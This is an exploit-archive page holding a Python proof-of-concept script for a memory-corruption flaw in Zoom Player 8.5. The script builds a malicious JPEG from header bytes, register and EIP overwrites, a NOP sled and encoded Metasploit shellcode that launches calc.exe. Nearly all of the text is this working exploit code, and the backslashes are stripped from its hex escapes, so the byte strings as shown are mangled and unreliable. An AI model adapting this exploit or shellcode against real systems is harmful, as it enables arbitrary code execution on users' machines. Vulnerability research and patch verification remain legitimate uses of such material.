Home / exploits Inmatrix Ltd. Zoom Player 8.5 Memory Corruption / Code Execution
Posted on 10 January 2013
# Exploit Title: Inmatrix Ltd. Zoom Player Crafted JPEG File Memory Corruption and Arbitrary Code Execution Exploit. # Version: Zoom Player v8.5 # Date: 09-1-2013 # Author: Debasish Mandal. # Blog : http://www.debasish.in/ # Software Link: http://www.inmatrix.com/files/zoomplayer_download.shtml # Vendor Homepage: http://www.inmatrix.com/ # Category: Local # Tested on: Windows XP SP2. # Vendor Patch: This issue is patched and affected version is removed from site. # http://forum.inmatrix.com/index.php?showtopic=13904 d = "xA3xD8xFFxE0x00x10x4Ax46x49x46x00x01x02x01x00x60x00x60x00x00xFFxEDx18x2Ex50x68x6Fx74x6Fx73x68x6Fx70x20x33x2Ex30x00x38x42x49x4Dx03xEDx0Ax52x65x73x6Fx6Cx75x74x69x6Fx6Ex00x00x00x00x10x00x60x00x00x00x01x00x01x00x60x00x00x00x01x00x01x38x42x49x4Dx04x0Dx18x46x58x20x47x6Cx6Fx62x61x6Cx20x4Cx69xE5x68x74x69x6Ex67x20x41x6Ex67x6Cx65x00x00x00x00x04x00x00x00x78x38x42x49x4Dx04x19x12x46x58x20x47x6Cx6Fx89x61x6Cx20x41x6Cx74x69x74x75x64x65x00x00x00x00x04x00x00x00x1Ex38x42x49x4Dx03xF3x0Bx50x72x69x6Ex74x20x46x6Cx61x67x73x00x00x00x09x00x00x00x00x00x00x00x00x01x00x38x42x49x4Dx04x0Ax0Ex43x6Fx70x79x72x69x67x68x74x20x46xA7x61x67x00x00x00x00x01x00x00x38x42x49x4Dx27x10x14x4Ax61x70x61x6Ex65x73x65x20x50x72x69x6Ex74x20x46x6Cx61x67x73x00x00x00x00x0Ax00x01x00x00x00x39x00x00x00x02x38x42x49x4Dx03xF5x17x43x6Fx6Cx6Fx72x20x48x61x6Cx66x74x6Fx6Ex65x20x53x65x74x74x69x6Ex67x73x00x00x00x48x00x2Fx66x66x00x01x00x6Cx66x66x00x06x00x00x00x00x00x01x00x2Fx66x66x00x01x00xA1x99x9Ax00x06x00x00x00x00x00x01x00x32x00x00x00x01x00x5Ax00x00x00x06x00x00x00x00x68x01x00x35x00x00x00x01x00x2Dx00x00x00x06x00x00x00x00xA1x01x38x42x49x4Dx03xF8x17x43x6Fx6Cx6Fx72x20x54x72x61x6Ex73x66x65x72x20x53x65x74x74x69x6Ex67x73x00x00x00x70x00x00xFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxB5xFFxFFxFFxFFxFFxFFxFFxFFxFFx03xE8x00x00x00x00xFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFx03xE8x00x00x00x00xFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFx03xE8x00x00x00x00xFFxFFxFFxFFxFFxFFxFFxFFxFFxFFx9DxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFx03xE8x00x00x38x42x49x4Dx04x08x06x47x75x69x64x65x73x00x00x00x00x10x00x00x00x01x00x00x02x40x00x00x02x40x00x00x00x00x38x42x49x45x04x1Ex0Dx55x52x4Cx20x6Fx76x65x72x72x69x64x65x73x00x00x00x04x00x00x00x00x38x42x49x4Dx04x1Ax06x53x6Cx69x63x65x73x00x00x00x00x75x00x00x00x06x00x00x00x00x00x00x00x00x00x00x02x58x00x00x03x20xBCx00x00x0Ax00x55x00x6Ex00x74x00x69x00x74x00x6Cx00x65x00x64x00x2Dx00x31x00x00x00x01x00x49x00x00x00xAEx00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x03x20x00x00x02x58x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x38x42x49x4Dx04x11x11x49x43x43x20x55x6Ex74x61x67x67x65x64x20x46x6Cx61x67x00x00x00x01x01x00x38x42x49x4Dx04x14x17x4Cx61x79x65x72x20x49x44x20x47x65x6Ex65x72x15x74x6Fx72x20x42x61x73x65x00x00x00x04x00x00x00x02x38x42x49x4Dx04x0Cx15x4Ex65x77x20x57x69x6Ex64x6Fx77x73x20x54x8Ex75x6Dx62x6Ex61x69x6Cx00x00x14x86x00x00x00x01x00x00x00x70x00x00x00x54x00x00x01x50x00x00x6Ex40x00x00x14x6Ax00x18x00x01xFFxD8xAExE0x00x10x4Ax46x49x46x00x01x02x01x00x48x00x48x00x00xFFxEEx00x0Ex41x64x6Fx62x65x00x64x80x00x00x00x01xFFxDBx00x84x00x0Cx08x08x08x09x08x0Cx09x09x0Cx11x0Bx0Ax0Bx11x15x0Fx0Cx0Cx0Fx15x18x13x13x15x13x13x18x11x0Cx0Cx0Cx0Cx0Cx0Cx11x0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx01x0Dx0Bx6Ax0Dx0Ex0Dx10x0Ex0Ex10x14x0Ex0Ex0Ex14x14x0Ex0Ex0Ex0Ex14x11x0Cx0Cx0Cx0Cx0Cx11x11x0Cx0Cx0Cx0Cx0Cx0Cx11x0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0Cx0CxFFxC0x00x11x08x00x54x00x70x03x01x22x00x02x11x01x03x11x01xFFxDDx00x d += "x86xf4x12x00" #EBX d += "x42"*24 #Padding d += "x86xf4x12x00" #EBX d += "x43"*8 #Padding d += "xA6xF4x12x00" #EIP - > 0012F4A6 on Stack d += "x50"*12 #Padding d += "x86xf4x12x00" #EAX d += "x90"*10 #NOPs #windows/exec - 227 bytes #http://www.metasploit.com #Encoder: x86/shikata_ga_nai #EXITFUNC=process, CMD=calc.exe, VERBOSE=false d += ("xbdx86x9fx31x9bxdbxdfxd9x74x24xf4x58x31xc9xb1" "x33x83xc0x04x31x68x0ex03xeex91xd3x6ex12x45x9a" "x91xeax96xfdx18x0fxa7x2fx7ex44x9axffxf4x08x17" "x8bx59xb8xacxf9x75xcfx05xb7xa3xfex96x79x6cxac" "x55x1bx10xaex89xfbx29x61xdcxfax6ex9fx2fxaex27" "xd4x82x5fx43xa8x1ex61x83xa7x1fx19xa6x77xebx93" "xa9xa7x44xafxe2x5fxeexf7xd2x5ex23xe4x2fx29x48" "xdfxc4xa8x98x11x24x9bxe4xfex1bx14xe9xffx5cx92" "x12x8ax96xe1xafx8dx6cx98x6bx1bx71x3axffxbbx51" "xbbx2cx5dx11xb7x99x29x7dxdbx1cxfdxf5xe7x95x00" "xdax6exedx26xfex2bxb5x47xa7x91x18x77xb7x7dxc4" "xddxb3x6fx11x67x9exe5xe4xe5xa4x40xe6xf5xa6xe2" "x8fxc4x2dx6dxd7xd8xe7xcax27x93xaax7axa0x7ax3f" "x3fxadx7cx95x03xc8xfex1cxfbx2fx1ex55xfex74x98" "x85x72xe4x4dxaax21x05x44xc9xa4x95x04x20x43x1e" "xaex3c") raw_input('[*] Press Enter to generate the malicious JPEG file: ') f = open('mal.jpg','w') f.write(d) f.close() print "[*] Malicious JPEG File generated Successfully.."
